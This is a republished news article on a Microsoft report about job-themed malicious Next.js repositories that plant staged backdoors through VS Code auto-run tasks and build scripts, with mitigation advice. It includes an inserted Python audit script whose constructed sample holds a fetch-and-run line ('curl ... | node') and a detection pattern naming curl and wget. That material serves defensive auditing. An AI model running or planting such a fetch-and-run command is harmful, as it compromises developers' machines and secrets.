Microsoft warns of job‑themed repo lures targeting developers with multi‑stage backdoors

News | February 26, 2026 | Artifice Prime

Microsoft says it has uncovered a coordinated campaign targeting software developers through malicious repositories posing as legitimate Next.js projects and technical assessments.

The campaign employs carefully crafted lures to blend into routine workflows, such as cloning repositories, opening projects, and running builds, thereby allowing the malicious code to execute undetected.

Telemetry collected during an incident investigation by Microsoft suggested the campaign’s alignment with a broader cluster of threats using job-themed tricks. “During initial incident analysis, Defender telemetry surfaced a limited set of malicious repositories directly involved in observed compromises,” the company wrote in a security blog post. “Further investigation uncovered additional related repositories that were not directly referenced in observed logs but exhibited the same execution mechanisms, loader logic, and staging infrastructure.”

The campaign exploits developers’ trust in shared code, gaining persistence within high-value developer systems that often contain source code, environment secrets, credentials, and access to build or cloud infrastructure.

Multiple triggers for remote control

Microsoft researchers found that the malicious repositories were engineered with redundancy, offering several execution paths that ultimately result in the same backdoor behavior.

In some cases, simply opening the project in Visual Studio Code was enough. The attackers abused workspace automation by embedding tasks configured to run automatically when a folder is opened and trusted. This causes code execution without the developer explicitly running anything.

Other variants rely on build processes or server startup routines, ensuring that the malicious code runs when developers perform typical actions such as launching a development server. Regardless of the trigger, the repositories retrieve additional JavaScript from remote infrastructure and execute it in memory, reducing traces on disk.

The retrieved payload operates in stages. An initial registration component identifies the host and can deliver bootstrap instructions, after which a separate C2 controller provides persistence and enables follow-on actions such as payload delivery and data exfiltration.
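As an added illustration (not code from Microsoft's report or from the repositories it describes), the following Python audit checks a cloned repository for the two trigger types described above: a `.vscode/tasks.json` task set to run on folderOpen, and npm scripts tied to install, dev-server or build steps that pull remote code. The helper name, the pattern list and the sample repository are constructed for this example.

```python
import json
import re

# Heuristic patterns for "fetch remote code and run it" in a script command
# (constructed for this example, not a list taken from the Microsoft report).
SUSPICIOUS_CMD = re.compile(r"(curl|wget|node\s+-e|eval\(|new Function\(|https?://)", re.I)
# npm scripts that run on routine developer actions: install, dev server, build.
AUTO_SCRIPTS = {"preinstall", "postinstall", "prepare", "dev", "start", "build"}


def load_jsonc(text):
    """Best-effort parse of VS Code's JSON-with-comments: drop // comment lines
    and trailing commas, then parse as plain JSON."""
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def audit_repo(files):
    """Hypothetical helper: files is {relative_path: text} for a cloned repo;
    returns findings for triggers that execute code without an explicit run."""
    findings = []
    if ".vscode/tasks.json" in files:
        for task in load_jsonc(files[".vscode/tasks.json"]).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append(f"VS Code task '{task.get('label')}' runs on folderOpen: "
                                f"{task.get('command')}")
    if "package.json" in files:
        for name, cmd in json.loads(files["package.json"]).get("scripts", {}).items():
            if name in AUTO_SCRIPTS and SUSPICIOUS_CMD.search(cmd):
                findings.append(f"package.json script '{name}' pulls remote code: {cmd}")
    return findings


# Constructed sample repo shaped like the lures described in the article.
SAMPLE_REPO = {
    ".vscode/tasks.json": """{
  // constructed sample, not a real repository
  "version": "2.0.0",
  "tasks": [{"label": "setup", "type": "shell", "command": "node .vscode/setup.js",
             "runOptions": {"runOn": "folderOpen"}}]
}""",
    "package.json": json.dumps({"name": "assessment-app", "scripts": {
        "dev": "curl -s http://example.invalid/b.js | node & next dev",
        "lint": "next lint"}}),
}
```

Running `audit_repo` over a freshly cloned repository before opening it in an editor, or before `npm install`, gives a cheap pre-trust check that complements Workspace Trust.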

Infection through a fake “coding test”

Microsoft said the investigation started with analyzing suspicious outbound connections from Node.js processes communicating with attacker-controlled servers. Correlating network activity with process telemetry led analysts back to the original infection, which arrived through recruiting exercises.

One of the repositories was hosted on Bitbucket and presented as a technical assessment, along with a related repository using the Cryptan-Platform-MVP1 naming convention. “Multiple repositories followed repeatable naming conventions and project ‘family’ patterns, enabling targeted searches for additional related repositories that were not directly referenced in observed telemetry but exhibited the same execution and staging behavior,” Microsoft wrote.

When an infection is suspected, Microsoft warns that affected organizations must immediately contain suspect endpoints, trace the initiating process tree, and hunt for repeated polling to suspicious infrastructure across the fleet. Because credential and session theft may follow, responders should evaluate identity risk, revoke sessions, and restrict high-risk SaaS actions to limit exposure during investigation.

Long-term mitigations include a focus on tightening developer trust boundaries and reducing execution risk, Microsoft added. Other recommendations include enforcing Visual Studio Code Workspace Trust defaults, applying attack surface reduction rules, enabling cloud-based reputation protections, and strengthening conditional access.

Original Link:https://www.infoworld.com/article/4137197/microsoft-warns-of-job%e2%80%91themed-repo-lures-targeting-developers-with-multi%e2%80%91stage-backdoors-2.html
Originally Posted: Wed, 25 Feb 2026 11:14:26 +0000


Artifice Prime

Artifice Prime is an AI enthusiast with over 25 years of experience as a Linux Sys Admin. They have an interest in Artificial Intelligence, its use as a tool to further humankind, as well as its impact on society.
